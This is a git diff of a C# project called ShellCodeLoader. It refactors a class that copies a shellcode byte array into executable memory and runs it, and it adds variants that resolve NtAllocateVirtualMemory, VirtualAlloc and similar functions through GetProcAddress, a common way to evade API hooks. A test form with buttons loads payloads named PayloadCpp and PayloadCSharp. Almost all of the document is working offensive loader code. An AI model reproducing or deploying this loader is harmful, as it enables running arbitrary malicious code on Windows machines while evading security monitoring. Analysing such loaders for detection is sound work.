diff --git a/.vs/ShellCodeLoader/v16/.suo b/.vs/ShellCodeLoader/v16/.suo
index 37328e5..2faaea6 100644
Binary files a/.vs/ShellCodeLoader/v16/.suo and b/.vs/ShellCodeLoader/v16/.suo differ
diff --git a/.vs/ShellCodeLoader/v16/Browse.VC.db b/.vs/ShellCodeLoader/v16/Browse.VC.db
index 2621b14..a00aa95 100644
Binary files a/.vs/ShellCodeLoader/v16/Browse.VC.db and b/.vs/ShellCodeLoader/v16/Browse.VC.db differ
diff --git a/.vs/ShellCodeLoader/v16/Browse.VC.db-shm b/.vs/ShellCodeLoader/v16/Browse.VC.db-shm
index 64bf7da..9f63776 100644
Binary files a/.vs/ShellCodeLoader/v16/Browse.VC.db-shm and b/.vs/ShellCodeLoader/v16/Browse.VC.db-shm differ
diff --git a/.vs/ShellCodeLoader/v16/Solution.VC.db b/.vs/ShellCodeLoader/v16/Solution.VC.db
new file mode 100644
index 0000000..86bbea7
Binary files /dev/null and b/.vs/ShellCodeLoader/v16/Solution.VC.db differ
diff --git a/.vs/ShellCodeLoader/v16/Solution.VC.db-shm b/.vs/ShellCodeLoader/v16/Solution.VC.db-shm
new file mode 100644
index 0000000..ad86a11
Binary files /dev/null and b/.vs/ShellCodeLoader/v16/Solution.VC.db-shm differ
diff --git a/.vs/ShellCodeLoader/v16/Solution.VC.db-wal b/.vs/ShellCodeLoader/v16/Solution.VC.db-wal
new file mode 100644
index 0000000..bfad33a
Binary files /dev/null and b/.vs/ShellCodeLoader/v16/Solution.VC.db-wal differ
diff --git a/PayloadCSharp/obj/Release/PayloadCSharp.csproj.AssemblyReference.cache b/PayloadCSharp/obj/Release/PayloadCSharp.csproj.AssemblyReference.cache
index 4082ba1..d1579b8 100644
Binary files a/PayloadCSharp/obj/Release/PayloadCSharp.csproj.AssemblyReference.cache and b/PayloadCSharp/obj/Release/PayloadCSharp.csproj.AssemblyReference.cache differ
diff --git a/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.AssemblyReference.cache b/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.AssemblyReference.cache
new file mode 100644
index 0000000..8ad0473
Binary files /dev/null and b/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.AssemblyReference.cache differ
diff --git a/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.FileListAbsolute.txt b/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.FileListAbsolute.txt
index 7c0909c..cea0c37 100644
--- a/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.FileListAbsolute.txt
+++ b/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.FileListAbsolute.txt
@@ -4,3 +4,4 @@ F:\Personal\ShellCodeLoader\PayloadCSharp\bin\x64\Release\PayloadCSharp.pdb
F:\Personal\ShellCodeLoader\PayloadCSharp\obj\x64\Release\PayloadCSharp.csproj.CoreCompileInputs.cache
F:\Personal\ShellCodeLoader\PayloadCSharp\obj\x64\Release\PayloadCSharp.exe
F:\Personal\ShellCodeLoader\PayloadCSharp\obj\x64\Release\PayloadCSharp.pdb
+F:\Personal\ShellCodeLoader\PayloadCSharp\obj\x64\Release\PayloadCSharp.csproj.AssemblyReference.cache
diff --git a/ShellCodeLoader.sln b/ShellCodeLoader.sln
index 0e2c252..7b17628 100644
--- a/ShellCodeLoader.sln
+++ b/ShellCodeLoader.sln
@@ -35,8 +35,8 @@ Global
{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Release|x86.Build.0 = Release|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|Any CPU.Build.0 = Debug|Any CPU
- {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.ActiveCfg = Debug|Any CPU
- {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.Build.0 = Debug|Any CPU
+ {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.ActiveCfg = Debug|x64
+ {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.Build.0 = Debug|x64
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x86.ActiveCfg = Debug|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x86.Build.0 = Debug|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|Any CPU.ActiveCfg = Debug|Any CPU
diff --git a/ShellCodeLoader/ShellCodeLoader.cs b/ShellCodeLoader/ShellCodeLoader.cs
index 19e3fb3..0697279 100644
--- a/ShellCodeLoader/ShellCodeLoader.cs
+++ b/ShellCodeLoader/ShellCodeLoader.cs
@@ -13,6 +13,7 @@ public class ShellCodeLoader : IDisposable
{
private byte[] ShellCode;
private IntPtr ptr;
+ private uint RegionSize;
///
/// Default is false.
///
@@ -24,40 +25,23 @@ public class ShellCodeLoader : IDisposable
public ShellCodeLoader(byte[] shellCode)
{
this.ShellCode = shellCode;
- Asynchronous = false;
+ this.RegionSize = (uint)shellCode.Length;
+ this.ptr = IntPtr.Zero;
+ this.Asynchronous = false;
}
public void LoadWithNT()
{
-
if (this.Asynchronous)
{
Task.Run(() =>
{
- this.ptr = IntPtr.Zero;
- uint RegionSize = (uint)ShellCode.Length;
- Imports.NtAllocateVirtualMemory(Imports.GetCurrentProcess(), ref ptr, IntPtr.Zero, ref RegionSize, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
- UIntPtr bytesWritten;
- Imports.NtWriteVirtualMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
- Imports.PageProtection flOld = new Imports.PageProtection();
- Imports.NtProtectVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, ref flOld);
- ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
- load();
- Imports.NtFreeVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, Imports.FreeType.MEM_RELEASE);
+ NT();
});
}
else
{
- this.ptr = IntPtr.Zero;
- uint RegionSize = (uint)ShellCode.Length;
- Imports.NtAllocateVirtualMemory(Imports.GetCurrentProcess(), ref ptr, IntPtr.Zero, ref RegionSize, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
- UIntPtr bytesWritten;
- Imports.NtWriteVirtualMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
- Imports.PageProtection flOld = new Imports.PageProtection();
- Imports.NtProtectVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, ref flOld);
- ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
- load();
- Imports.NtFreeVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, Imports.FreeType.MEM_RELEASE);
+ NT();
}
}
@@ -67,55 +51,145 @@ public void LoadWithKernel32()
{
Task.Run(() =>
{
- this.ptr = Imports.VirtualAlloc(IntPtr.Zero, (IntPtr)ShellCode.Length, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
- uint RegionSize = (uint)ShellCode.Length;
- UIntPtr writtenBytes;
- Imports.WriteProcessMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
- Imports.PageProtection flOld;
- Imports.VirtualProtect(ptr, RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, out flOld);
- ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
- load();
- Imports.VirtualFree(ptr, (uint)0, Imports.FreeType.MEM_RELEASE);
+ Kernel32();
+ });
+ }
+ else
+ {
+ Kernel32();
+ }
+ }
+
+ public void LoadWithNTDelegates()
+ {
+ if (this.Asynchronous)
+ {
+ Task.Run(() =>
+ {
+ NTDelegates();
});
}
else
{
- this.ptr = Imports.VirtualAlloc(IntPtr.Zero, (IntPtr)ShellCode.Length, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
- uint RegionSize = (uint)ShellCode.Length;
- UIntPtr writtenBytes;
- Imports.WriteProcessMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
- Imports.PageProtection flOld;
- Imports.VirtualProtect(ptr, RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, out flOld);
- ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
- load();
- Imports.VirtualFree(ptr, (uint)0, Imports.FreeType.MEM_RELEASE);
+ NTDelegates();
}
}
+
+ public void LoadWithKernel32Delegates()
+ {
+ if (this.Asynchronous)
+ {
+ Kernel32Delegates();
+ }
+ else
+ {
+ Kernel32Delegates();
+ }
+ }
+
+ private void NT()
+ {
+ Imports.NtAllocateVirtualMemory(Imports.GetCurrentProcess(), ref ptr, IntPtr.Zero, ref RegionSize, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
+ UIntPtr bytesWritten;
+ Imports.NtWriteVirtualMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
+ Imports.PageProtection flOld = new Imports.PageProtection();
+ Imports.NtProtectVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, ref flOld);
+ ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
+ load();
+ Imports.NtFreeVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, Imports.FreeType.MEM_RELEASE);
+ }
+
+ private void Kernel32()
+ {
+ this.ptr = Imports.VirtualAlloc(IntPtr.Zero, (IntPtr)ShellCode.Length, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
+ UIntPtr writtenBytes;
+ Imports.WriteProcessMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
+ Imports.PageProtection flOld;
+ Imports.VirtualProtect(ptr, RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, out flOld);
+ ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
+ load();
+ Imports.VirtualFree(ptr, (uint)0, Imports.FreeType.MEM_RELEASE);
+ }
+
+ private void NTDelegates()
+ {
+ IntPtr ExportedNtAllocateVirtualMemory = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.NTDLL), "NtAllocateVirtualMemory");
+ Imports.Delegates.NtAllocateVirtualMemory NtAllocateVirtualMemory = (Imports.Delegates.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(ExportedNtAllocateVirtualMemory, typeof(Imports.Delegates.NtAllocateVirtualMemory));
+ NtAllocateVirtualMemory(Imports.GetCurrentProcess(), ref ptr, IntPtr.Zero, ref RegionSize, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
+
+ UIntPtr bytesWritten;
+ IntPtr ExportedNtWriteVirtualMemory = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.NTDLL), "NtWriteVirtualMemory");
+ Imports.Delegates.NtWriteVirtualMemory NtWriteVirtualMemory = (Imports.Delegates.NtWriteVirtualMemory)Marshal.GetDelegateForFunctionPointer(ExportedNtWriteVirtualMemory, typeof(Imports.Delegates.NtWriteVirtualMemory));
+ NtWriteVirtualMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
+
+ Imports.PageProtection flOld = new Imports.PageProtection();
+ IntPtr ExportedNtProtectVirtualMemory = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.NTDLL), "NtProtectVirtualMemory");
+ Imports.Delegates.NtProtectVirtualMemory NtProtectVirtualMemory = (Imports.Delegates.NtProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(ExportedNtProtectVirtualMemory, typeof(Imports.Delegates.NtProtectVirtualMemory));
+ NtProtectVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, ref flOld);
+
+ ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
+ load();
+
+ IntPtr ExportedNtFreeVirtualMemory = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.NTDLL), "NtFreeVirtualMemory");
+ Imports.Delegates.NtFreeVirtualMemory NtFreeVirtualMemory = (Imports.Delegates.NtFreeVirtualMemory)Marshal.GetDelegateForFunctionPointer(ExportedNtFreeVirtualMemory, typeof(Imports.Delegates.NtFreeVirtualMemory));
+ NtFreeVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, Imports.FreeType.MEM_RELEASE);
+ }
+
+ private void Kernel32Delegates()
+ {
+ IntPtr ExportedVirtualAlloc = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.KERNEL32), "VirtualAlloc");
+ Imports.Delegates.VirtualAlloc VirtualAlloc = (Imports.Delegates.VirtualAlloc)Marshal.GetDelegateForFunctionPointer(ExportedVirtualAlloc, typeof(Imports.Delegates.VirtualAlloc));
+ this.ptr = VirtualAlloc(IntPtr.Zero, (IntPtr)ShellCode.Length, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
+
+ UIntPtr writtenBytes;
+ IntPtr ExportedWriteProcessMemory = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.KERNEL32), "WriteProcessMemory");
+ Imports.Delegates.WriteProcessMemory WriteProcessMemory = (Imports.Delegates.WriteProcessMemory)Marshal.GetDelegateForFunctionPointer(ExportedWriteProcessMemory, typeof(Imports.Delegates.WriteProcessMemory));
+ WriteProcessMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
+
+ Imports.PageProtection flOld;
+ IntPtr ExportedVirtualProtect = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.KERNEL32), "VirtualProtect");
+ Imports.Delegates.VirtualProtect VirtualProtect = (Imports.Delegates.VirtualProtect)Marshal.GetDelegateForFunctionPointer(ExportedVirtualProtect, typeof(Imports.Delegates.VirtualProtect));
+ VirtualProtect(ptr, RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, out flOld);
+
+ ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
+ load();
+
+ IntPtr ExportedVirtualFree = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.KERNEL32), "VirtualFree");
+ Imports.Delegates.VirtualFree VirtualFree = (Imports.Delegates.VirtualFree)Marshal.GetDelegateForFunctionPointer(ExportedVirtualFree, typeof(Imports.Delegates.VirtualFree));
+ Imports.VirtualFree(ptr, (uint)0, Imports.FreeType.MEM_RELEASE);
+ }
+
private static class Imports
{
+
internal const String KERNEL32 = "kernel32.dll";
internal const String NTDLL = "ntdll.dll";
- [DllImport(NTDLL, SetLastError = true, ExactSpelling = true)]
+ [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern uint NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref uint RegionSize, TypeAlloc AllocationType, PageProtection Protect);
- [DllImport(NTDLL, SetLastError = true, ExactSpelling = true)]
+ [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern uint NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] buffer, UIntPtr bufferSize, out UIntPtr written);
- [DllImport(NTDLL, SetLastError = true, ExactSpelling = true)]
+ [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern uint NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint numberOfBytes, PageProtection newProtect, ref PageProtection oldProtect);
- [DllImport(NTDLL, SetLastError = true, ExactSpelling = true)]
+ [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern uint NtFreeVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint RegionSize, FreeType FreeType);
- [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true)]
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern IntPtr GetCurrentProcess();
- [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true)]
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern IntPtr VirtualAlloc(IntPtr address, IntPtr numBytes, TypeAlloc commitOrReserve, PageProtection pageProtectionMode);
- [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true)]
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern IntPtr VirtualFree(IntPtr lpAddress, uint dwSize, FreeType FreeType);
- [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true)]
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, PageProtection flNewProtect, out PageProtection lpflOldProtect);
- [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true)]
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UIntPtr nSize, out UIntPtr lpNumberOfBytesWritten);
+ [DllImport(KERNEL32)]
+ public static extern IntPtr GetModuleHandle(string lpModuleName);
+ [DllImport(KERNEL32)]
+ public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
+
public enum PageProtection : uint
{
PAGE_EXECUTE = 0x10,
@@ -150,6 +224,27 @@ public enum FreeType : uint
MEM_COALESCE_PLACEHOLDERS = 0x00000001,
MEM_PRESERVE_PLACEHOLDER = 0x00000002
}
+
+ internal static class Delegates
+ {
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ public delegate uint NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref uint RegionSize, TypeAlloc AllocationType, PageProtection Protect);
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ public delegate uint NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] buffer, UIntPtr bufferSize, out UIntPtr written);
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ public delegate uint NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint numberOfBytes, PageProtection newProtect, ref PageProtection oldProtect);
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ public delegate uint NtFreeVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint RegionSize, FreeType FreeType);
+
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ public delegate IntPtr VirtualAlloc(IntPtr address, IntPtr numBytes, TypeAlloc commitOrReserve, PageProtection pageProtectionMode);
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ public delegate IntPtr VirtualFree(IntPtr lpAddress, uint dwSize, FreeType FreeType);
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ public delegate bool VirtualProtect(IntPtr lpAddress, uint dwSize, PageProtection flNewProtect, out PageProtection lpflOldProtect);
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ public delegate bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UIntPtr nSize, out UIntPtr lpNumberOfBytesWritten);
+ }
}
private bool _disposed = false;
diff --git a/ShellCodeLoader/ShellCodeLoader.csproj b/ShellCodeLoader/ShellCodeLoader.csproj
index 6841c72..3d87c82 100644
--- a/ShellCodeLoader/ShellCodeLoader.csproj
+++ b/ShellCodeLoader/ShellCodeLoader.csproj
@@ -32,13 +32,7 @@
-
-
-
-
-
-
diff --git a/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.AssemblyReference.cache b/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.AssemblyReference.cache
index 40190bb..e83d642 100644
Binary files a/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.AssemblyReference.cache and b/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.AssemblyReference.cache differ
diff --git a/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.CoreCompileInputs.cache b/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.CoreCompileInputs.cache
index 5ee1e98..cae91c6 100644
--- a/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.CoreCompileInputs.cache
+++ b/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.CoreCompileInputs.cache
@@ -1 +1 @@
-a8992992a2a1f857e94d2c190e6e2acb3d35d990
+2f4efe2492a647ca473cd41a9e195057146d9428
diff --git a/ShellCodeLoader/obj/Debug/ShellCodeLoader.dll b/ShellCodeLoader/obj/Debug/ShellCodeLoader.dll
index 89c5963..ac59f58 100644
Binary files a/ShellCodeLoader/obj/Debug/ShellCodeLoader.dll and b/ShellCodeLoader/obj/Debug/ShellCodeLoader.dll differ
diff --git a/ShellCodeLoader/obj/Debug/ShellCodeLoader.pdb b/ShellCodeLoader/obj/Debug/ShellCodeLoader.pdb
index c0c69b6..238d608 100644
Binary files a/ShellCodeLoader/obj/Debug/ShellCodeLoader.pdb and b/ShellCodeLoader/obj/Debug/ShellCodeLoader.pdb differ
diff --git a/ShellCodeLoader/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/ShellCodeLoader/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache
index 3ff27a2..a606657 100644
Binary files a/ShellCodeLoader/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache and b/ShellCodeLoader/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
index 6ada075..a08e837 100644
--- a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
+++ b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
@@ -1 +1 @@
-9fef0c49f4b5f7b005b68c57fc326668b2cc8ace
+1c02f89cdd426da38f937db1d7ded7d8cbdc2708
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.dll b/ShellCodeLoader/obj/Release/ShellCodeLoader.dll
index 5e34293..c12f470 100644
Binary files a/ShellCodeLoader/obj/Release/ShellCodeLoader.dll and b/ShellCodeLoader/obj/Release/ShellCodeLoader.dll differ
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.pdb b/ShellCodeLoader/obj/Release/ShellCodeLoader.pdb
index d7a84de..345f2ae 100644
Binary files a/ShellCodeLoader/obj/Release/ShellCodeLoader.pdb and b/ShellCodeLoader/obj/Release/ShellCodeLoader.pdb differ
diff --git a/Test/Form1.Designer.cs b/Test/Form1.Designer.cs
index b9fafbe..f84a27c 100644
--- a/Test/Form1.Designer.cs
+++ b/Test/Form1.Designer.cs
@@ -31,6 +31,8 @@ private void InitializeComponent()
{
this.button1 = new System.Windows.Forms.Button();
this.button2 = new System.Windows.Forms.Button();
+ this.button3 = new System.Windows.Forms.Button();
+ this.button4 = new System.Windows.Forms.Button();
this.SuspendLayout();
//
// button1
@@ -53,11 +55,33 @@ private void InitializeComponent()
this.button2.UseVisualStyleBackColor = true;
this.button2.Click += new System.EventHandler(this.button2_Click);
//
+ // button3
+ //
+ this.button3.Location = new System.Drawing.Point(12, 89);
+ this.button3.Name = "button3";
+ this.button3.Size = new System.Drawing.Size(121, 59);
+ this.button3.TabIndex = 2;
+ this.button3.Text = "NT Delegates";
+ this.button3.UseVisualStyleBackColor = true;
+ this.button3.Click += new System.EventHandler(this.button3_Click);
+ //
+ // button4
+ //
+ this.button4.Location = new System.Drawing.Point(149, 89);
+ this.button4.Name = "button4";
+ this.button4.Size = new System.Drawing.Size(121, 59);
+ this.button4.TabIndex = 3;
+ this.button4.Text = "Kernel32 Delegates";
+ this.button4.UseVisualStyleBackColor = true;
+ this.button4.Click += new System.EventHandler(this.button4_Click);
+ //
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
- this.ClientSize = new System.Drawing.Size(292, 94);
+ this.ClientSize = new System.Drawing.Size(292, 160);
+ this.Controls.Add(this.button4);
+ this.Controls.Add(this.button3);
this.Controls.Add(this.button2);
this.Controls.Add(this.button1);
this.Name = "Form1";
@@ -70,6 +94,8 @@ private void InitializeComponent()
private System.Windows.Forms.Button button1;
private System.Windows.Forms.Button button2;
+ private System.Windows.Forms.Button button3;
+ private System.Windows.Forms.Button button4;
}
}
diff --git a/Test/Form1.cs b/Test/Form1.cs
index c98bee3..0928139 100644
--- a/Test/Form1.cs
+++ b/Test/Form1.cs
@@ -61,5 +61,52 @@ private void button2_Click(object sender, EventArgs e)
csharp.Dispose();
}
}
+
+ private void button3_Click(object sender, EventArgs e)
+ {
+ if (IntPtr.Size == 8)
+ {
+ ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp64.rawData);
+ cpp.LoadWithNTDelegates();
+ cpp.Dispose();
+ ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp64.rawData);
+ csharp.LoadWithNTDelegates();
+ csharp.Dispose();
+ }
+ else
+ {
+ ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp32.rawData);
+ cpp.Asynchronous = true;
+ cpp.LoadWithNTDelegates();
+ cpp.Dispose();
+ ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp32.rawData);
+ csharp.LoadWithNTDelegates();
+ csharp.Dispose();
+ }
+ }
+
+ private void button4_Click(object sender, EventArgs e)
+ {
+ if (IntPtr.Size == 8)
+ {
+ ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp64.rawData);
+ cpp.LoadWithKernel32Delegates();
+ cpp.Dispose();
+ ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp64.rawData);
+ csharp.LoadWithKernel32Delegates();
+ csharp.Dispose();
+ }
+ else
+ {
+ ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp32.rawData);
+ cpp.Asynchronous = true;
+ cpp.LoadWithKernel32Delegates();
+ cpp.Dispose();
+ ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp32.rawData);
+ csharp.LoadWithKernel32Delegates();
+ csharp.Dispose();
+ }
+
+ }
}
}
diff --git a/Test/obj/Debug/DesignTimeResolveAssemblyReferences.cache b/Test/obj/Debug/DesignTimeResolveAssemblyReferences.cache
index c1ef4da..d9c9611 100644
Binary files a/Test/obj/Debug/DesignTimeResolveAssemblyReferences.cache and b/Test/obj/Debug/DesignTimeResolveAssemblyReferences.cache differ
diff --git a/Test/obj/Debug/Test.csproj.AssemblyReference.cache b/Test/obj/Debug/Test.csproj.AssemblyReference.cache
index f5e894a..9e11a68 100644
Binary files a/Test/obj/Debug/Test.csproj.AssemblyReference.cache and b/Test/obj/Debug/Test.csproj.AssemblyReference.cache differ
diff --git a/Test/obj/Debug/Test.csproj.GenerateResource.cache b/Test/obj/Debug/Test.csproj.GenerateResource.cache
index ee0944a..f2904a4 100644
Binary files a/Test/obj/Debug/Test.csproj.GenerateResource.cache and b/Test/obj/Debug/Test.csproj.GenerateResource.cache differ
diff --git a/Test/obj/Debug/Test.exe b/Test/obj/Debug/Test.exe
index 70a2d0f..724be4d 100644
Binary files a/Test/obj/Debug/Test.exe and b/Test/obj/Debug/Test.exe differ
diff --git a/Test/obj/Debug/Test.pdb b/Test/obj/Debug/Test.pdb
index 806e98b..6080acc 100644
Binary files a/Test/obj/Debug/Test.pdb and b/Test/obj/Debug/Test.pdb differ
diff --git a/Test/obj/Release/Test.Form1.resources b/Test/obj/Release/Test.Form1.resources
new file mode 100644
